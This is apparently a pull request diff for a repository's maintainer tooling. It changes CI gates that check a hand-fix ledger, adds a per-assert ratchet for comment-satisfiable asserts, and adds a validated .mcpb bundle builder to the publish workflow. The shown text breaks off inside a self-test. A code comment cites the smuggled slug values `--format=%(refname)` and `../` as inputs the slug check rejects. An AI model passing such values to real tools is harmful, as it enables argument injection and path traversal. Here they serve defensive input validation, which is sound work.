### PR TITLE
chore(maintainer): slug grammar (#251), comment-satisfiable ledger asserts (#252), and a .mcpb builder that produces launchable bundles (#287)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -29,6 +29,29 @@ jobs:
         # per-skill ledger gate covers recorded fixes there. See docs/reprint-survival.md.
         run: python3 tools/maintainer/check_handfixes.py --changed --base "${{ github.event.pull_request.base.sha }}"
 
+      - name: Maintainer gate self-tests (each gate proved BOTH directions)
+        # One step, three proofs, about three seconds. A gate that cannot fail is
+        # worthless and a gate that always fires is worse, so each of these
+        # asserts its check is silent on the repo's real inputs AND fires on the
+        # defect it was written for:
+        #   registry.py       - every registered slug and source_dir loads clean
+        #                       (including skills/_meta, which the SLUG rule
+        #                       rejects on purpose), and nine malformed
+        #                       identifiers are refused before they reach the
+        #                       build matrix's unquoted shell interpolations.
+        #   check_handfixes.py- issue #252's reproduction: the same assert is
+        #                       silent while the guarded code is present and
+        #                       fires once only a comment carries the needle.
+        #   mcpb_bundle.py    - the published .mcpb defect (issue #287), a broken
+        #                       per-OS override, a 0644 binary and a ZIP_STORED
+        #                       member all fail; a built bundle and the
+        #                       connectwise-manage manifest shape both pass.
+        run: |
+          set -euo pipefail
+          python3 tools/maintainer/registry.py --self-test
+          python3 tools/maintainer/check_handfixes.py --self-test
+          python3 tools/maintainer/mcpb_bundle.py --self-test
+
       - name: Skill contract (frontmatter + required files)
         run: python3 tools/maintainer/check_skill_contract.py
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -26,22 +26,48 @@ jobs:
         # also recording it in skills/<slug>/handfixes.json, fail - so a new
         # hand-fix is captured the moment it is introduced and survives the next
         # reprint. Reprints (many generated files at once) are exempted; the
-        # per-skill ledger gate covers recorded fixes there. See docs/reprint-survival.md.
+        # per-skill ledger gate covers recorded fixes there.
+        #
+        # Also the issue #252 ratchet, scoped per ASSERT: an assert this PR ADDS
+        # or WEAKENS must not be one comments alone can satisfy. An assert that
+        # was already comment-satisfiable at the base revision is the repo's
+        # backlog, not this contributor's, and is reported by the advisory lint
+        # below instead - editing an entry's prose never trips this gate.
+        # See docs/reprint-survival.md.
         run: python3 tools/maintainer/check_handfixes.py --changed --base "${{ github.event.pull_request.base.sha }}"
 
+      - name: Comment-satisfiable hand-fix asserts (advisory, repo-wide)
+        # ADVISORY: exits 0 on findings, by design. 26 of the 2280 `contains`
+        # asserts can be satisfied by a comment alone today, several of them
+        # deliberately (a `Hand-wired:` marker IS a comment). Making that a
+        # merge gate would red main for everyone and get the lint ignored - the
+        # false-RED failure mode. The hard ratchet is the --changed step above,
+        # so the number can only go down; this step is what makes the standing
+        # backlog visible on every run instead of only when somebody remembers
+        # to type the flag. Add --strict to make it fail once the list is empty.
+        run: python3 tools/maintainer/check_handfixes.py --lint-asserts
+
       - name: Maintainer gate self-tests (each gate proved BOTH directions)
-        # One step, three proofs, about three seconds. A gate that cannot fail is
-        # worthless and a gate that always fires is worse, so each of these
-        # asserts its check is silent on the repo's real inputs AND fires on the
-        # defect it was written for:
+        # One step, three proofs. A gate that cannot fail is worthless and a gate
+        # that always fires is worse, so each of these asserts its check is
+        # silent on the repo's real inputs AND fires on the defect it was
+        # written for:
         #   registry.py       - every registered slug and source_dir loads clean
         #                       (including skills/_meta, which the SLUG rule
-        #                       rejects on purpose), and nine malformed
+        #                       rejects on purpose), and eleven malformed
         #                       identifiers are refused before they reach the
         #                       build matrix's unquoted shell interpolations.
+        #                       The trailing-newline cases carry their own proof
+        #                       that they discriminate: the `$`-anchored twin of
+        #                       each pattern must ACCEPT what `\Z` refuses.
         #   check_handfixes.py- issue #252's reproduction: the same assert is
         #                       silent while the guarded code is present and
-        #                       fires once only a comment carries the needle.
+        #                       fires once only a comment carries the needle;
+        #                       `code_only` is refused where it would WEAKEN an
+        #                       assert; and the --changed ratchet passes a
+        #                       prose-only ledger edit while failing a newly
+        #                       added or newly weakened assert (four cases, run
+        #                       against a throwaway git repository).
         #   mcpb_bundle.py    - the published .mcpb defect (issue #287), a broken
         #                       per-OS override, a 0644 binary and a ZIP_STORED
         #                       member all fail; a built bundle and the

--- a/.github/workflows/mcp-publish.yml
+++ b/.github/workflows/mcp-publish.yml
@@ -90,6 +90,20 @@ jobs:
           # publisher binary something worth stealing.
           persist-credentials: false
 
+      # The checkout above is pinned to the TAG being published, so it carries
+      # whatever tools/maintainer/ looked like when that tag was cut. workflow_run
+      # always runs the DEFAULT BRANCH's copy of this workflow file, so the
+      # bundle builder it calls must come from the default branch too - otherwise
+      # every tag cut before mcpb_bundle.py landed would silently fall back to
+      # the hand-rolled zip that produced 64 unlaunchable bundles (issue #287).
+      # skills/<slug>/manifest.json still comes from the tag, which is correct:
+      # the manifest must match the released version.
+      - name: Checkout the default branch's maintainer tools
+        uses: actions/checkout@v4
+        with:
+          path: maintainer-tools
+          persist-credentials: false
+
       - name: Set up jq
         run: sudo apt-get update && sudo apt-get install -y jq
 
@@ -120,30 +134,55 @@ jobs:
           EXPECTED_BINARIES: "5"
         run: |
           set -euo pipefail
-          cd mcpb-build
-          # MCPB is a zip with manifest.json + a bin/ directory of the binaries.
-          mkdir -p bundle/bin
-          cp "../skills/$SKILL/manifest.json" bundle/manifest.json
-          copied=0
-          for f in "$SKILL"-mcp-*; do
-            [ -f "$f" ] || continue
-            cp "$f" "bundle/bin/$f"
-            copied=$((copied + 1))
-          done
+          copied=$(find mcpb-build -maxdepth 1 -type f -name "${SKILL}-mcp-*" | wc -l | tr -d ' ')
           # The download step tolerates a per-asset failure with `|| true`, and the
           # upload uses --clobber. Together those mean a transient GitHub outage
           # could produce a manifest-only bundle and OVERWRITE a working released
           # .mcpb with it. Refuse to build a bundle that is missing binaries: a
           # failed run leaves the previous good asset in place, which is the safe
           # direction.
-          echo "bundled $copied binary/binaries"
+          echo "downloaded $copied binary/binaries"
           if [ "$copied" -lt "$EXPECTED_BINARIES" ]; then
             echo "::error::only $copied of $EXPECTED_BINARIES platform binaries were downloaded for $SKILL;" \
                  "refusing to build a partial bundle that --clobber would publish over the working asset"
             exit 1
           fi
-          (cd bundle && zip -r "../${SKILL}-mcp.mcpb" .)
-          ls -la "${SKILL}-mcp.mcpb"
+          # MCPB is a zip with manifest.json + a bin/ directory of binaries. Hand
+          # rolling that with `zip -r` is what shipped 64 bundles the host cannot
+          # start: the manifest named bin/<slug>-mcp while the archive held only
+          # arch-suffixed binaries, and `gh release download` + `zip -r` left every
+          # one of them mode 0644. The builder merges the two darwin slices into a
+          # universal Mach-O, writes per-OS platform_overrides that resolve, sets
+          # the executable bit, and refuses to emit a bundle that does not validate.
+          # See issue #287 and tools/maintainer/mcpb_bundle.py.
+          #
+          # --binary-prefix is "$SKILL-mcp" - exactly the names the download loop
+          # asked for and release.yml uploaded. It is deliberately NOT derived from
+          # manifest.json's `name`, which still reads "<slug>-pp-mcp" on eight
+          # connectors and would name members that do not exist.
+          python3 maintainer-tools/tools/maintainer/mcpb_bundle.py build \
+            --manifest "skills/$SKILL/manifest.json" \
+            --bin-dir mcpb-build \
+            --binary-prefix "${SKILL}-mcp" \
+            --out "mcpb-build/${SKILL}-mcp.mcpb" \
+            --version "$VERSION"
+          ls -la "mcpb-build/${SKILL}-mcp.mcpb"
+
+      - name: Bundle can actually launch (every declared command resolves)
+        env:
+          SKILL: ${{ needs.detect.outputs.skill }}
+        # Separate from the build step on purpose: the builder validates its own
+        # output, and this re-asserts it against the file on disk, before the
+        # upload, so a bundle that cannot start never reaches a release or the
+        # registry. Asserts each of mcp_config.command and every
+        # platform_overrides.<os>.command names a member the archive contains and
+        # that the member is executable. It does NOT assert
+        # entry_point == "bin/<mcp binary>" - that would codify the broken bare
+        # name and false-RED connectwise-manage, the one manifest that can launch.
+        run: |
+          set -euo pipefail
+          python3 maintainer-tools/tools/maintainer/mcpb_bundle.py validate \
+            "mcpb-build/${SKILL}-mcp.mcpb"
 
       - name: Compute SHA-256
         id: sha

--- a/docs/contributing.md
+++ b/docs/contributing.md
@@ -62,6 +62,16 @@ regenerates it from the press template, so every credited connector pins its
 `check_handfixes.py` fails CI if a regeneration drops the line. That is what makes
 "survives a regeneration" a checked promise rather than an intention.
 
+A ledger assert counts its marker in the whole file, comments included, so an
+assert on a code symbol that a doc comment also names can pass after the code is
+gone. Add `"code_only": true` to that assert to count comment-stripped source
+instead, or `"code_only": false` when the comment **is** what must survive. It
+must be a JSON boolean, and it belongs only on a `contains` assert - a
+`not_contains` is always checked whole-file, which is already its strongest
+form. The full schema, and the advisory
+`check_handfixes.py --lint-asserts` report, are in
+[reprint survival](/reprint-survival/).
+
 Where that credit reaches today: `cli/NOTICE` is in the repository and in every
 source checkout. The release assets are the two binaries plus their `.sha256`
 files, and the `.mcpb` bundle is `manifest.json` plus those binaries, so no

--- a/docs/reprint-survival.md
+++ b/docs/reprint-survival.md
@@ -76,7 +76,9 @@ Add an entry whenever you hand-edit a generated file:
       "spec_encode_followup": "optional: the x-... annotation this should become",
       "asserts": [
         {"file": "cli/internal/store/store.go", "contains": "\"id_\"", "min_count": 2},
-        {"file": "cli/internal/mcp/tools.go", "not_contains": "fmt.Sprintf(\"%v\", v), 1)"}
+        {"file": "cli/internal/mcp/tools.go", "not_contains": "fmt.Sprintf(\"%v\", v), 1)"},
+        {"file": "cli/internal/config/config.go", "contains": "stripAuthScheme(",
+         "min_count": 1, "code_only": true}
       ]
     }
   ]
@@ -86,6 +88,8 @@ Add an entry whenever you hand-edit a generated file:
 - `file` is relative to `skills/<slug>/`.
 - `contains` + `min_count` (default 1): the marker that must be present.
 - `not_contains`: an anti-pattern that must stay gone (e.g. the buggy line a fix removed).
+- `code_only` (optional, JSON boolean, `contains` only): where the `contains`
+  needle is counted. See the next section.
 - `status`: `active` = connector-only, a reprint would clobber it; `upstreamed`
   = also fixed in the press, so a reprint from a fixed press regenerates it -
   but the back-port must still be present today. Both are asserted present.
@@ -93,6 +97,44 @@ Add an entry whenever you hand-edit a generated file:
 Pick markers that are **specific** (a distinctive substring of the fix), not
 generic. When you intentionally change a fix, update its ledger entry in the
 same PR.
+
+#### `code_only`: what the `contains` needle is counted in
+
+An assert counts its needle in the **whole file, comments included**. So an
+assert whose needle a doc comment also carries stays green after the code it
+guards is deleted - the exact failure the gate exists to catch (issue #252).
+`code_only` is how you say which one you meant:
+
+| value | what it does | when to use it |
+| --- | --- | --- |
+| absent (default) | whole-file count | fine when the needle cannot appear in prose |
+| `true` | count **comment-stripped source** only - strictly stronger, the needle must survive in code | the normal fix for a needle a comment also contains |
+| `false` | whole-file count, and the lint stays quiet | the comment **is** the thing a reprint must not drop (a `Hand-wired:` marker, an explanatory paragraph) |
+
+Three rules the gate enforces, each of them a hard ledger error rather than a
+silent no-op:
+
+- **It must be a JSON boolean.** `"code_only": "true"` (a string) changes no
+  counting at all while reading like a declared intent - a gate failing open in
+  the quietest possible way.
+- **It only ever makes an assert stronger.** `code_only` scopes a `contains`
+  count and nothing else, so setting it on an assert with no `contains` is
+  refused. A `not_contains` assert is *always* checked whole-file, which is
+  already its strongest form: the banned pattern must be absent from code AND
+  from comments. Stripping comments there could only hide a banned line
+  resurrected inside a comment.
+- **The target's language must have comments.** `code_only` on a `.json` file
+  is refused: JSON has no comment syntax, so accepting it would report a
+  stronger check than was run. Strippers exist for `.go`, `.mod`, `.py`, `.sh`,
+  `.bash` and `.md`.
+
+Two ways this is checked. `check_handfixes.py --lint-asserts` reports every
+comment-satisfiable `contains` assert repo-wide; it is **advisory** (exit 0) and
+runs on every CI run, because 26 asserts are in that shape today and some of
+them deliberately. The **hard** gate is `--changed`, which fires only on an
+assert a change *adds or weakens* - editing an entry's `why` never trips it.
+
+    python3 tools/maintainer/check_handfixes.py --lint-asserts   # advisory report
 
 ### 3. Capture the lesson (this doc + press retros)
 

--- a/tools/maintainer/check_engine_freshness.py
+++ b/tools/maintainer/check_engine_freshness.py
@@ -50,12 +50,12 @@ import argparse
 import glob
 import json
 import os
-import re
 import subprocess
 import sys
 from pathlib import Path
 
 sys.path.insert(0, str(Path(__file__).resolve().parent))
+import registry  # noqa: E402  (local tools/ module)
 import release_state  # noqa: E402  (local tools/ module)
 
 REPO = str(Path(__file__).resolve().parent.parent.parent)
@@ -68,7 +68,11 @@ ERROR = 1
 # but this script is also run by hand and must not depend on its caller for
 # safety: a slug like "--format=%(refname)" would be read by `git tag --list` as
 # an option, and one containing "../" would escape the skills tree.
-SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")
+#
+# One definition, from registry.py, so this cannot drift from the grammar the
+# build matrix is validated against - and so it carries the same `\Z` anchor
+# (Python's `$` also matches before a trailing newline).
+SLUG_RE = registry.SLUG_RE
 
 
 def _press_version(manifest: dict):

--- a/tools/maintainer/check_env_schema.py
+++ b/tools/maintainer/check_env_schema.py
@@ -133,6 +133,14 @@ connectwise-manage - the one manifest carrying `platform_overrides` - is the onl
 one whose entry_point is right. Enforcing the bare name would codify a fleet-wide
 break and false-RED the single correct manifest.
 
+The true version of that assertion lives in the sibling gate
+`tools/maintainer/mcpb_bundle.py validate`, which checks the built .mcpb rather
+than the on-disk manifest: every path the bundled manifest declares - the base
+command and each platform_overrides.<os>.command - must name a member the archive
+actually contains, and that member must be executable. That is checkable only
+against a bundle, which is why it runs in mcp-publish.yml and not here. See
+issue #287.
+
 Modes:
   --slug <slug>   check one skill. An UNRECOGNISED slug is a usage error, not a
                   vacuous pass: CI runs this per-skill from a matrix, so a drifted

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -60,6 +60,18 @@ but to make the author say which one they meant, with `code_only`:
     false             "this assert deliberately targets a comment." Whole-file
                       count, and the lint stays quiet about it.
 
+`code_only` modifies a `contains` count and NOTHING else. It is REFUSED on an
+assert that carries no `contains` key, because on a `not_contains` assert the
+whole-file scan is already the strictest form available: the banned pattern must
+be absent from code AND from comments. Stripping comments there could only ever
+HIDE a reappearance - a banned line resurrected inside a comment would stop being
+reported. A flag that reads as "stronger" while making one assert kind weaker is
+the same fail-open shape this gate exists to prevent, so `not_contains` is always
+evaluated against the whole file and the flag is an error rather than a trap.
+(An assert may carry both keys; `code_only` then scopes only the `contains` half,
+which is why the refusal keys off the ABSENCE of `contains`, not the presence of
+`not_contains`.)
+
 `code_only` must be a JSON boolean. A string ("true") is a hard ledger error,
 not a shrug: it changes no counting at all while reading like a declared intent,
 which is a gate failing open in the quietest possible way.
@@ -293,6 +305,28 @@ def check_skill(slug: str) -> list[str]:
                     f"comment). A non-boolean silently changes nothing while looking like it does."
                 )
                 continue
+
+            # `code_only` scopes a `contains` count and nothing else. On an
+            # assert with no `contains`, the flag has no count to strengthen -
+            # and applying it to the `not_contains` scan would WEAKEN that
+            # assert, because a banned pattern resurrected inside a comment
+            # would stop being reported. `not_contains` therefore always reads
+            # the whole file, and the flag is refused here rather than accepted
+            # as a silent downgrade dressed up as a hardening.
+            if "code_only" in a and "contains" not in a:
+                failures.append(
+                    f"[{slug}] handfix '{hid}': assert on '{rel}' sets \"code_only\": "
+                    f"{a['code_only']!r} but has no 'contains' needle for it to scope. "
+                    f"`code_only` narrows a `contains` count to comment-stripped source; a "
+                    f"`not_contains` assert is ALWAYS checked against the whole file, which is "
+                    f"already the strongest form - the banned pattern must be absent from code "
+                    f"and from comments. Stripping comments there could only hide a "
+                    f"reappearance, so the flag is refused instead of quietly weakening the "
+                    f"check. Drop it. See {doc}."
+                )
+                continue
+
+            code_content = content
             scope = "the file"
             if a.get("code_only") is True:
                 stripped, why = strip_comments(rel, content)
@@ -304,13 +338,13 @@ def check_skill(slug: str) -> list[str]:
                         f"file whose language has comments."
                     )
                     continue
-                content = stripped
+                code_content = stripped
                 scope = "the comment-stripped source"
 
             if "contains" in a:
                 needle = a["contains"]
                 min_count = int(a.get("min_count", 1))
-                found = content.count(needle)
+                found = code_content.count(needle)
                 if found < min_count:
                     failures.append(
                         f"[{slug}] handfix '{hid}' REGRESSED in {rel}: expected {min_count}x "
@@ -318,11 +352,14 @@ def check_skill(slug: str) -> list[str]:
                         f"hand-fix (or, if intentionally changed, update skills/{slug}/handfixes.json). See {doc}."
                     )
             if "not_contains" in a:
+                # Deliberately `content`, never `code_content`: an absence check
+                # is strongest over the whole file.
                 banned = a["not_contains"]
                 if banned in content:
                     failures.append(
                         f"[{slug}] handfix '{hid}' REGRESSED in {rel}: banned anti-pattern "
-                        f"`{banned}` is present again in {scope}. A reprint likely reintroduced it. See {doc}."
+                        f"`{banned}` is present again in the file (comments included - an absence "
+                        f"check is strongest whole-file). A reprint likely reintroduced it. See {doc}."
                     )
             if "contains" not in a and "not_contains" not in a:
                 failures.append(f"[{slug}] handfix '{hid}': assert for '{rel}' needs 'contains' or 'not_contains'")
@@ -349,6 +386,16 @@ class WeakAssert:
 
     def key(self) -> str:
         return f"{self.slug}/{self.hid}/{self.rel}/{self.needle}"
+
+    def identity(self) -> str:
+        """What makes this the SAME assert across two revisions.
+
+        Deliberately excludes the entry's prose (`summary`, `why`, `status`) and
+        its `id`: none of those change what is checked, so editing them must not
+        turn a pre-existing weak assert into "newly weakened by this change".
+        `min_count` IS included - changing the threshold changes the assert.
+        """
+        return "\0".join((self.slug, self.rel, self.needle, str(self.min_count)))
 
     def describe(self) -> str:
         return (
@@ -379,7 +426,26 @@ def lint_skill(slug: str) -> list[WeakAssert]:
     return lint_entries(slug, skill_dir, data["handfixes"])
 
 
-def lint_entries(slug: str, skill_dir: Path, entries: list) -> list[WeakAssert]:
+def lint_entries(slug: str, skill_dir: Path, entries: list,
+                 read_file=None) -> list[WeakAssert]:
+    """Find every comment-satisfiable `contains` assert in `entries`.
+
+    `read_file(rel)` returns the target file's text, or None when it does not
+    exist at that revision. It defaults to reading the working tree; the
+    --changed ratchet passes a reader backed by `git show <base>:...` so the
+    same lint can be run against the base revision and the two results compared.
+
+    `not_contains` asserts are out of scope by construction, not by oversight:
+    they are always evaluated whole-file, which is their strongest form, so
+    there is no comment-weak shape for one to be in.
+    """
+    if read_file is None:
+        def read_file(rel: str) -> str | None:
+            fpath = skill_dir / rel
+            if not fpath.exists():
+                return None
+            return fpath.read_text(encoding="utf-8", errors="replace")
+
     weak: list[WeakAssert] = []
     for hf in entries:
         hid = hf.get("id", "<unnamed>")
@@ -392,10 +458,9 @@ def lint_entries(slug: str, skill_dir: Path, entries: list) -> list[WeakAssert]:
             rel = a.get("file")
             if not rel:
                 continue
-            fpath = skill_dir / rel
-            if not fpath.exists():
+            content = read_file(rel)
+            if content is None:
                 continue
-            content = fpath.read_text(encoding="utf-8", errors="replace")
             stripped, _ = strip_comments(rel, content)
             if stripped is None:
                 continue  # no comment syntax (JSON, NOTICE): nothing to be weak about
@@ -417,8 +482,9 @@ def lint_asserts(slug: str | None, strict: bool) -> int:
     `Hand-wired:` marker IS a comment). Turning a 26-finding lint into a merge
     gate before those are annotated would red main for everyone and get the
     lint ignored - the false-RED failure mode. The ratchet lives in --changed
-    instead, where a ledger entry that is NEW OR EDITED in the change-set is
-    linted hard, so the number can only go down.
+    instead, where an assert that this change-set ADDS or WEAKENS is linted
+    hard, so the number can only go down - and a contributor editing an entry's
+    prose is not billed for a weak assert that was already there.
     """
     slugs = [slug] if slug else sorted(p.parent.name for p in SKILLS.glob("*/handfixes.json"))
     weak: list[WeakAssert] = []
@@ -567,6 +633,11 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
     files at once) are exempted from the must-record requirement; the
     must-survive gate covers recorded fixes there.
 
+    Also runs the issue #252 ratchet over the ledgers this change touches: an
+    assert that is NEWLY ADDED or NEWLY WEAKENED here must not be one comments
+    alone can satisfy. Pre-existing weak asserts are the repo's backlog, not
+    this contributor's, so they are left to the advisory `--lint-asserts`.
+
     `allow_missing_base` is the deliberate opt-out for a local checkout with no
     base ref. It prints SKIP (never PASS) so no reader can mistake it for a
     verified change, and CI never passes it."""
@@ -626,12 +697,28 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
             f"the spec). See docs/reprint-survival.md."
         )
 
-    # The issue #252 ratchet. A ledger entry that is NEW or EDITED in this
-    # change-set must not carry an assert comments alone can satisfy. Scoped to
-    # the entries the diff actually touched (not the whole ledger) so adding one
-    # entry to a connector is never blocked by a pre-existing weak assert in a
-    # neighbouring entry - the number can only go down, and nobody is taxed for
-    # somebody else's backlog.
+    # The issue #252 ratchet. An assert that is NEWLY ADDED or NEWLY WEAKENED by
+    # this change must not be one comments alone can satisfy.
+    #
+    # The comparison is per ASSERT, against the base revision, and it re-runs
+    # the lint over the BASE ledger reading the BASE files. That is what makes
+    # "newly weakened" mean what it says:
+    #
+    #   * editing only an entry's prose (`why`, `summary`, `status`) leaves
+    #     every assert's identity and weakness unchanged -> silent. A
+    #     contributor is never taxed for a pre-existing weak assert they did
+    #     not write and did not touch.
+    #   * adding a weak assert, or changing an existing one's file / needle /
+    #     min_count into a weak shape -> fires, because that identity was not
+    #     weak at base.
+    #   * leaving an assert alone while editing the ledger and changing the
+    #     guarded file so the needle survives only in comments -> also fires:
+    #     same identity, not weak at base, weak now.
+    #
+    # An entry-level comparison (the first cut of this ratchet) got the first
+    # case wrong: any edit to an entry re-linted every assert inside it, so a
+    # one-word prose fix hard-failed CI on somebody else's backlog. The number
+    # can still only go down; nobody is billed for a debt they did not incur.
     weak_new: list[WeakAssert] = []
     for slug in sorted(ledger_touched):
         skill_dir = SKILLS / slug
@@ -640,10 +727,17 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
         if err or data is None:
             continue  # the ledger gate itself reports an unreadable ledger
         base_entries = _entries_at_base(base, rel)
-        for hf in data["handfixes"]:
-            if base_entries is not None and _canonical(hf) in base_entries:
-                continue  # byte-identical to base: not this change-set's entry
-            weak_new.extend(lint_entries(slug, skill_dir, [hf]))
+        if base_entries is None:
+            already_weak: set[str] = set()  # brand-new ledger: nothing pre-exists
+        else:
+            already_weak = {
+                w.identity()
+                for w in lint_entries(slug, skill_dir, base_entries,
+                                      read_file=_base_reader(base, slug))
+            }
+        for w in lint_entries(slug, skill_dir, data["handfixes"]):
+            if w.identity() not in already_weak:
+                weak_new.append(w)
 
     if failures or weak_new:
         if failures:
@@ -652,26 +746,23 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
                 print(f"  - {f}")
             print()
         if weak_new:
-            print("FAIL: hand-fix ledger entries added or edited in this change carry asserts that "
-                  "comments alone can satisfy (issue #252):\n")
+            print("FAIL: this change ADDS or WEAKENS hand-fix asserts that comments alone can "
+                  "satisfy (issue #252). Each one below was not weak at the base revision:\n")
             for w in weak_new:
                 print(f"  - {w.describe()}\n")
+            print("Only asserts this change introduced or weakened are listed. Asserts that were "
+                  "already comment-satisfiable before it are NOT your bill: `--lint-asserts` "
+                  "reports those repo-wide, advisory.")
+            print("The `code_only` tri-state is documented in docs/reprint-survival.md "
+                  "(\"Ledger schema\") and in this file's module docstring. See issue #252.")
         return 1
     print("PASS: every generated-file hand-edit in this change is recorded (or part of a reprint), "
-          "and no ledger entry it touches has a comment-satisfiable assert.")
+          "and no assert this change added or weakened is comment-satisfiable.")
     return 0
 
 
-def _canonical(entry: object) -> str:
-    """A stable serialization used only to tell "unchanged since base" apart
-    from "new or edited here"."""
-    return json.dumps(entry, sort_keys=True, separators=(",", ":"))
-
-
-def _entries_at_base(base: str, rel: str) -> set[str] | None:
-    """The base revision's handfix entries, canonicalized. None when the ledger
-    does not exist at base (a brand-new ledger: every entry is this change's) or
-    cannot be read."""
+def _show(base: str, rel: str) -> str | None:
+    """`git show <base>:<rel>`, or None when the path does not exist there."""
     import subprocess
 
     try:
@@ -681,16 +772,181 @@ def _entries_at_base(base: str, rel: str) -> set[str] | None:
         )
     except (OSError, subprocess.SubprocessError):
         return None
-    if out.returncode != 0:
+    return out.stdout if out.returncode == 0 else None
+
+
+def _base_reader(base: str, slug: str):
+    """A `lint_entries` file reader bound to the BASE revision.
+
+    The ratchet has to know whether an assert was ALREADY weak before this
+    change, and weakness is a property of (assert, target file). Reading the
+    target from the working tree while linting the base ledger would compare
+    two different things and mislabel a pre-existing weakness as new."""
+    def read(rel: str) -> str | None:
+        return _show(base, f"skills/{slug}/{rel}")
+    return read
+
+
+def _entries_at_base(base: str, rel: str) -> list | None:
+    """The base revision's handfix entries. None when the ledger does not exist
+    at base (a brand-new ledger: every assert in it is this change's) or cannot
+    be parsed."""
+    text = _show(base, rel)
+    if text is None:
         return None
     try:
-        data = json.loads(out.stdout)
+        data = json.loads(text)
     except json.JSONDecodeError:
         return None
     entries = data.get("handfixes")
-    if not isinstance(entries, list):
-        return None
-    return {_canonical(e) for e in entries}
+    return entries if isinstance(entries, list) else None
+
+
+def _self_test_ratchet() -> list[str]:
+    """End-to-end both-directions proof of the --changed ratchet, in a real git repo.
+
+    The ratchet is hard-fail in CI, so its SCOPE has to be proved, not asserted.
+    A first cut of it compared whole ledger ENTRIES and so hard-failed a
+    contributor who edited one entry's `why` field, on a weak assert that was
+    already in the repo. Four cases, run against a throwaway repository:
+
+        A  prose-only edit to an entry with a pre-existing weak assert  -> PASS
+        B  a genuinely NEW weak assert                                  -> FAIL
+        C  a new entry whose asserts are all strong                     -> PASS
+        D  an untouched assert the change WEAKENS (the guarded code moves
+           into a comment)                                              -> FAIL
+
+    Returns a list of failure strings (empty == proved).
+    """
+    import io
+    import contextlib
+    import subprocess
+    import tempfile
+
+    out: list[str] = []
+    needle = "stripAuthScheme"
+    rel_go = "cli/internal/config/config.go"
+    # raw 2 / code 1 -> min_count 1 is satisfied by CODE: not weak.
+    strong_src = (f"// {needle} removes a scheme prefix so the token is sent bare.\n"
+                  f"func {needle}(v string) string {{ return v }}\n")
+    # raw 1 / code 0 -> only the comment carries it: weak.
+    weak_src = (f"// {needle} removes a scheme prefix so the token is sent bare.\n"
+                f"func authHeader(v string) string {{ return v }}\n")
+
+    def ledger(entries):
+        return json.dumps({"slug": "fixture", "handfixes": entries}, indent=2) + "\n"
+
+    weak_assert = {"file": rel_go, "contains": needle, "min_count": 1}
+    base_entries = [{"id": "auth-scheme", "summary": "s", "why": "original prose",
+                     "asserts": [weak_assert]}]
+
+    with tempfile.TemporaryDirectory() as td:
+        root = Path(td)
+        skill = root / "skills" / "fixture"
+        (skill / "cli" / "internal" / "config").mkdir(parents=True)
+
+        def git(*args):
+            return subprocess.run(["git", "-C", str(root), *args],
+                                  capture_output=True, text=True)
+
+        git("init", "-q", "-b", "main")
+        git("config", "user.email", "gate@example.test")
+        git("config", "user.name", "gate")
+        (skill / rel_go).write_text(weak_src, encoding="utf-8")
+        (skill / "handfixes.json").write_text(ledger(base_entries), encoding="utf-8")
+        git("add", "-A")
+        git("commit", "-q", "-m", "base")
+        base = git("rev-parse", "HEAD").stdout.strip()
+        if not base:
+            return ["ratchet self-test could not create a git fixture (is git on PATH?)"]
+
+        def run_case(label, mutate, expected_rc):
+            git("checkout", "-q", base, "--", ".")
+            git("checkout", "-q", base)
+            (skill / rel_go).write_text(weak_src, encoding="utf-8")
+            (skill / "handfixes.json").write_text(ledger(base_entries), encoding="utf-8")
+            mutate()
+            git("add", "-A")
+            git("commit", "-q", "-m", label)
+            saved_repo, saved_skills = globals()["REPO"], globals()["SKILLS"]
+            buf = io.StringIO()
+            try:
+                globals()["REPO"], globals()["SKILLS"] = root, root / "skills"
+                with contextlib.redirect_stdout(buf):
+                    rc = changed(base)
+            finally:
+                globals()["REPO"], globals()["SKILLS"] = saved_repo, saved_skills
+            if rc != expected_rc:
+                out.append(f"ratchet case {label}: expected exit {expected_rc}, got {rc}. "
+                           f"Output: {buf.getvalue().strip()[:400]}")
+            return buf.getvalue()
+
+        # A: prose only. The weak assert is untouched and was weak at base.
+        def prose_only():
+            e = json.loads(json.dumps(base_entries))
+            e[0]["why"] = "clarified prose, no assert touched"
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+        run_case("A-prose-only", prose_only, 0)
+
+        # B: a genuinely new weak assert added to the same entry.
+        def add_weak():
+            e = json.loads(json.dumps(base_entries))
+            e[0]["asserts"].append({"file": rel_go, "contains": "scheme prefix", "min_count": 1})
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+        text_b = run_case("B-new-weak-assert", add_weak, 1)
+        if "scheme prefix" not in text_b:
+            out.append("ratchet case B: the NEW weak assert must be the one reported")
+        if "min_count" not in text_b and needle in text_b.replace("scheme prefix", ""):
+            out.append("ratchet case B: the pre-existing weak assert must NOT be re-reported")
+
+        # C: a whole new entry whose asserts are strong.
+        def add_strong_entry():
+            e = json.loads(json.dumps(base_entries))
+            e.append({"id": "new-clean", "summary": "s", "why": "w",
+                      "asserts": [{"file": rel_go, "contains": "func authHeader", "min_count": 1}]})
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+        run_case("C-new-strong-entry", add_strong_entry, 0)
+
+        # D: the assert text is untouched, but this change moves the guarded
+        # code into a comment. Same identity, not weak at base, weak now.
+        def weaken_the_file():
+            e = json.loads(json.dumps(base_entries))
+            e[0]["asserts"] = [{"file": rel_go, "contains": needle, "min_count": 2}]
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+        # start D from a base where the assert is NOT weak
+        (skill / rel_go).write_text(strong_src, encoding="utf-8")
+        strong_base_entries = [{"id": "auth-scheme", "summary": "s", "why": "original prose",
+                                "asserts": [{"file": rel_go, "contains": needle, "min_count": 1}]}]
+        (skill / "handfixes.json").write_text(ledger(strong_base_entries), encoding="utf-8")
+        git("add", "-A")
+        git("commit", "-q", "-m", "strong-base")
+        strong_base = git("rev-parse", "HEAD").stdout.strip()
+
+        def run_from(base_sha, label, mutate, expected_rc):
+            mutate()
+            git("add", "-A")
+            git("commit", "-q", "-m", label)
